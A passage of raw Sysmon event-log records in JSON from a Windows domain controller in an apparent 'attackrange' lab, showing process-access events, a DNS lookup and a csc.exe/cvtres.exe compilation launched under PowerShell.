05:52:14.873","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4395,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4396,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4397,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-001067620600}\r\nSourceProcessId: 2968\r\nSourceThreadId: 3368\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-030E-5F25-0000-00102C740600}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BAF2F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-001067620600}","SourceProcessId":"2968","SourceThreadId":"3368","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-030E-5F25-0000-00102C740600}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BAF2F)","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4398,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030E-5F25-0000-00102C740600}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030E-5F25-0000-00102C740600}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4399,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.873\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-030E-5F25-0000-00102C740600}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.873","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-030E-5F25-0000-00102C740600}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4400,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.233\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010E7C30000}\r\nProcessId: 1220\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.233","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010E7C30000}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4401,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.118\r\nProcessGuid: {A837DB8D-030F-5F25-0000-0010A4770600}\r\nProcessId: 4672\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES61DE.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCDE68155D781E4E7E995EDFE0D91EEFB6.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-030E-5F25-0000-00102C740600}\r\nParentProcessId: 2392\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\r1wdh35o.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.118","ProcessGuid":"{A837DB8D-030F-5F25-0000-0010A4770600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES61DE.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCDE68155D781E4E7E995EDFE0D91EEFB6.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-030E-5F25-0000-00102C740600}","ParentProcessId":"2392","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\r1wdh35o.cmdline\"","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4402,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.108","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4403,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.108\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 